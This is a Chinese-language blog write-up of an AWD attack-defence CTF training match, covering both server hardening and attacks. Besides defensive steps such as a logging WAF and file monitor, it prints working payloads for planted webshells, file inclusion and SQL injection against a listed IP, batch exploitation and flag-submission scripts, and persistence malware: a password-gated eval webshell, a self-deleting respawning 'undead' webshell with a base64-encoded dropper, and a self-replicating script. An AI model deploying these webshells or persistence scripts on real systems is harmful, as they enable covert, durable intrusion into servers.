AWD之赛前赛后

编程入门行业动态更新时间:2024-10-10 12:26:04

AWD之<a href=https://www.elefans.com/category/jswz/34/1734864.html style= 赛前赛后"/>

AWD之赛前赛后

0xdawn

作为一名资深懒狗，距离上一次星盟四月AWD训练赛过去一个月，在五月训练前才开始整理AWD，请大佬轻锤。

训练赛使用的是实验室自研的H1ve平台，强行安利一下H1ve顺便吹一波彭锅

赛后总结我拿的是第一道题web_yunnan_simple来写的

上线后

上线一定要快，晚点上线人家马都给你安排上了

修改ssh密码

passwd username //回车输入新密码

备份源码

tar -zcvf /tmp/web.tar.gz /var/www/html/*	//tar打包

定期备份的话因人而异，我不是很喜欢用

crontab backupcrontab.txt

backupcrontab.txt中写入

0 1 * * * tar -zcvf /tmp/web.tar.gz /var/www/html/*

详见：Linux中使用crontab设置定时任务

预留后门查杀

D盾
WebShellKiller

config.php

@eval($_REQUEST['c']);payload：
http://106.52.236.34:10180/config.php?c=system(%27cat%20/flag%27);

footer.php

$shell=$_POST['shell'];
system($shell);payload：
POST
shell=cat /flag

admin/footer.php同上

admin/header.php

<?php $p=$_GET['p'];echo $p;$q=exec($p);var_dump($q);
?>payload：
http://106.52.236.34:10180/admin/header.php?p=cat%20/flag

修改Mysql密码

mysql -u root -p	//登陆后用以下命令
set password for root@localhost=password('新密码');

备份数据库

账号密码一般在config.php，如果修改了密码记得修改config.php

备份：mysqldump -u root -p dbname>db.sql
还原：create database tmp;use tmp;source db.sql

修改admin默认密码

update admin set user_pass='新密码' where user_name='admin';

上回只补了login页面的sql注入，没注意到默认密码可以一直登录拿flag

添加脚本

流量监控

郁离歌大佬的waf

<?phperror_reporting(0); 
define('LOG_FILEDIR','/tmp/loooooooogs');
if(!is_dir(LOG_FILEDIR)){mkdir(LOG_FILEDIR);
}
function waf() 
{ 
if (!function_exists('getallheaders')) { 
function getallheaders() { 
foreach ($_SERVER as $name => $value) { 
if (substr($name, 0, 5) == 'HTTP_') 
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
} 
return $headers; 
} 
} 
$get = $_GET; 
$post = $_POST; 
$cookie = $_COOKIE; 
$Session = $_SESSION;  // added
$header = getallheaders(); 
$files = $_FILES; 
$ip = $_SERVER["REMOTE_ADDR"]; 
$method = $_SERVER['REQUEST_METHOD']; 
$filepath = $_SERVER["SCRIPT_NAME"]; 
foreach ($_FILES as $key => $value) { 
$files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']); 
file_put_contents($_FILES[$key]['tmp_name'], "virink"); 
}unset($header['Accept']);
$input = array("Get"=>$get, "Post"=>$post, "Cookie"=>$cookie, "File"=>$files, "Session"=>$_SESSION,"Header"=>$header);logging($input);}function logging($var){ 
$filename = $_SERVER['REMOTE_ADDR'];
$LOG_FILENAME = LOG_FILEDIR."/".$filename;
$time = date("Y-m-d G:i:s");
file_put_contents($LOG_FILENAME, "\r\n".$time."\r\n".print_r($var, true), FILE_APPEND); 
file_put_contents($LOG_FILENAME,"\r\n".'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'], FILE_APPEND);
file_put_contents($LOG_FILENAME,"\r\n***************************************************************",FILE_APPEND);
}waf();

使用方法：

在所有php文件中加入``require_once(‘waf.php’);

懒狗的话直接找个公用文件，如config.php，然后包含waf

或者修改php.ini文件

Automatically add files before or after any PHP document.
auto_prepend_file = /var/www/html/waf.php;

另外一个功能更强大的：

文件监控

<?php
/*
-------------------------------------------------File Name：     fileMonitorDescription :Author :       CoolCatdate：          2019/1/3
-------------------------------------------------Change Activity:2019/1/3:
-------------------------------------------------
*/
class FileMonitor
{private $dir;private $i=0;private $files = [];private $filesize = [];public function __construct($argv){$this->dir = $this->getparam($argv);$this->getfiles($this->dir);print "[+] total:".count($this->files[$this->i])."\n\r";$this->i++;while(true){$this->getfiles($this->dir);if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])>count($this->files[$this->i-1])))){print "[+] total:".count($this->files[$this->i])."\n\r";print "[*] addfile: ".implode('|',array_diff($this->files[$this->i],$this->files[$this->i-1]))."\n\r";}if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])<count($this->files[$this->i-1])))){print "[+] total:".count($this->files[$this->i])."\n\r";print "[*] deletefile: ".implode('|',array_diff($this->files[$this->i-1],$this->files[$this->i]))."\n\r";}if(isset($this->filesize[$this->i-1])){array_map(function($v,$val,$key){if($v != $val){print "[*] updatefile:{$key}\n\r";}},$this->filesize[$this->i-1],$this->filesize[$this->i],array_keys($this->filesize[$this->i]));}$this->i++;if($this->i>=30){$this->files = [];$this->filesize = [];$this->i = 0;}}}private function getparam($argv){foreach($argv as $key=>$val){if($val == "--dir"){return is_dir($argv[$key+1])?$argv[$key+1]:exit("[-] directory does not exist!");}}}private function getfiles($dir){if(is_dir($dir)){$d = scandir($dir);foreach($d as $v){if($v != '.' && $v != '..'){if(is_dir("{$dir}/{$v}")){$this->getfiles("{$dir}/{$v}");	}else{$this->files[$this->i][] = "{$dir}/{$v}";$this->filesize[$this->i]["{$dir}/{$v}"] = filesize("{$dir}/{$v}");}}}}else{$this->files[$this->i][] = $dir;$this->filesize[$this->i][$dir] = filesize($dir);}}
}
print " _____________< FileMonitor >-------------/\_)o<|       | | O . O |\_____/By CoolCat
";
new FileMonitor($argv);
?>

用法

php fileMonitor.php --dir ./

代码审计

文件包含

about.php

$file=$_GET['file'];
include $file;payload：
http://106.52.236.34:10180/about.php?file=../../../flag

contact.php

$file_path = $_GET['path'];
if(file_exists($file_path)){$fp = fopen($file_path,"r");$str = fread($fp,filesize($file_path));echo $str = str_replace("\r\n","<br />",$str);
}payload：
http://106.52.236.34:10180/contact.php?path=../../../flag

sql注入

login.php

<?phpinclude_once('config.php');if (!empty($_POST['username'])) {$user=$_POST['username'];$pass=$_POST['password'];$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";$data = mysqli_query($dbc,$query);	if (mysqli_num_rows($data) == 1) {$row = mysqli_fetch_array($data);$_SESSION['username'] = $row['user_name'];header('Location: ./admin/index.php');}else{echo '<hr/><center><br/>用户名：',$user,'<br/>密码：',$pass,'<br/><br/>用户名密码错误</center>';}} 
?>payload:
username：admin' and 1=1#
password：随便填

search.php

<?phpinclude 'header.php';include_once('config.php');if (!empty($_GET['id'])) {$id=$_GET['id'];$query = "SELECT * FROM news WHERE id=$id";$data = mysqli_query($dbc,$query);	}$com = mysqli_fetch_array($data); 
?>payload：
http://106.52.236.34:10180/search.php?id=-1%20union%20select%201,group_concat(user_name,0x7e,user_pass),3%20from%20test.admin%23

敏感信息泄露

admin/index.php

这里也挺鸡贼的，打到一半才发现这里直接就把flag给泄露出去了，admin登录直接拿到

<h3>flag:<?php system("cat /flag")?></h3>

admin/upload/1532851316.php

<?php phpinfo();?>

文件上传

$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{if($name!==""){$name1=substr($name,-4);if(is_uploaded_file($tmpName)){$time=time();$rootpath='./upload/'.$time.$name1;$file=fopen($tmpName, "r") or die('No such file!');$content=fread($file, filesize($tmpName));if(strstr($content,'fuck')){exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");}if(!move_uploaded_file($tmpName,$rootpath)){echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";exit;}}echo "上传成功：/upload/".$time.$name1;}
}
catch(Exception $e)
{echo "ERROR";
}//直接传一句话小马就行，没有任何过滤

文件上传的洞还不太会修，训练赛的时候尝试补了一下，但是页面直接挂了。所以我直接注释掉输出上传文件的位置，并且重命名时在时间戳后面再拼了一些东西，所以即使传了马也用不了。似乎也没被check的样子…

$rootpath='./upload/'.$time.'随便拼点东西进来'.$name1;

修补工作

open_basedir

在php.ini中加入open_basedir="/var/www/html"
在程序中加入ini_set('open_basedir', '/var/www/html');
在apache的httpd.conf中的Directory配置php_admin_value open_basedir "/var/www/html"
httpd.conf中的VritualHostphp_admin_value open_basedir "/var/www/html"
nginx fastcgi.conf：fastcgi_param PHP_VALUE "open_basedir=/var/www/html"

addslashes

$id=addslashes($id);	//sql语句中记得给$id加上单引号

批量打全场

打预留马

手速要快，预留的估计打个一两轮就没了，发现了就赶紧跑脚本打

import requests
import time#GET
url = "http://106.52.236.34:1"
payload = "/config.php?c=system('cat /flag');"for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.get(flag_url)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)'''
#POST
url = "http://106.52.236.34:1"
payload = "/footer.php"
data = {'shell':'cat /flag'}for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.post(flag_url,data=data)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)
'''

提交flag

#coding:utf-8
import requests
import re
import timeurl = "http://ip:"
url1 = ""
shell = "/includes/config.php?d=system"
passwd = "c" 
port = "80"
payload = {passwd: 'cat /flag'}flag_server = "http://flag_server/flag_file.php?token=%s&flag=%s"
teamtoken = "team1"def submit_flag(target, teamtoken, flag):url = flag_server % (teamtoken, flag)pos = {}print "[+]Submitting flag:%s:%s" % (target, url)response = requests.post(url, data=pos)content = response.textprint "[+]content:%s" % contentif "success" in content:print "[+]Success!!"return Trueelse:print "[-]Failed"return Falsedef flag():f=open("webshelllist.txt","w") f1=open("firstround_flag.txt","w")for i in [8802,8803,8804]: url1=url+str(i)+shelltry:print "------------------------------------"res=requests.post(url1,payload,timeout=1)if res.status_code == requests.codes.ok:print url1 + " connect shell sucess,flag is "+res.text# 记录shell和获取的flagprint >>f1,url1+" connect shell sucess,flag is "+res.textprint >>f,url1+","+passwd# 正则捕获flagif re.match(r'hello world(\w+)', res.text):   flag = re.match(r'hello world(\w+)', res.text).group(1)submit_flag(url1, teamtoken, flag)else:print "[-]Can not get flag"else:print "shell 404"except:print url1 + "connect shell failed"f.close()f1.close()def timer(n):while True:flag()flag()flag()time.sleep(n)timer(300) # 一般为5分钟一轮

权限维持

软连接

ln -s /flag css/XXXXXXXX.css

<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./css/8c2cbd7d93921dcd0859d0564a1df398.css')){system('ln -s /flag css/8c2cbd7d93921dcd0859d0564a1df398.css');}usleep(100);}
?>

一句话马

<?php if(md5($_POST["pass"])=="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST['hack']);} ?>

不死马

<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./.header.php')){file_put_contents('./.header.php','<?php if(md5($_POST["pass"])==="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST["hack"]);} ?>');}system('chmod 777 .header.php');touch("./.header.php",mktime(20,15,1,4,28,2019));usleep(100);}
?>"system(base64_decode(ZWNobyAnUEQ5d2FIQWdDZ2xwWjI1dmNtVmZkWE5sY2w5aFltOXlkQ2gwY25WbEtUc0tDWE5sZEY5MGFXMWxYMnhwYldsMEtEQXBPd29KZFc1c2FXNXJLRjlmUmtsTVJWOWZLVHNLQ1hkb2FXeGxJQ2d4S1hzS0NRbHBaaWdoWm1sc1pWOWxlR2x6ZEhNb0p5NHZMbWhsWVdSbGNpNXdhSEFuS1NsN0Nna0pDV1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2N1THk1b1pXRmtaWEl1Y0dod0p5d25QRDl3YUhBZ2FXWW9iV1ExS0NSZlVFOVRWRnNpY0dGemN5SmRLVDA5UFNKaVl6SXlPV1ZsWXpjME5tSmhOalpoWkRGbE16STJabVkyTkRCbE9UaG1ZaUlwZTBCbGRtRnNLQ1JmVUU5VFZGc2lhR0ZqYXlKZEtUdDlJRDgrSnlrN0Nna0pmUW9KQ1hONWMzUmxiU2duWTJodGIyUWdOemMzSUM1b1pXRmtaWEl1Y0dod0p5azdDZ2tKZEc5MVkyZ29JaTR2TG1obFlXUmxjaTV3YUhBaUxHMXJkR2x0WlNneU1Dd3hOU3d4TERRc01qZ3NNakF4T1NrcE93b0pDWFZ6YkdWbGNDZ3hNREFwT3dvSmZRby9QZz09JyB8IGJhc2U2NCAtZCA+IC5jb25maWcucGhwOw==));"

核弹马

<?php set_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}?><?phpset_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}
?>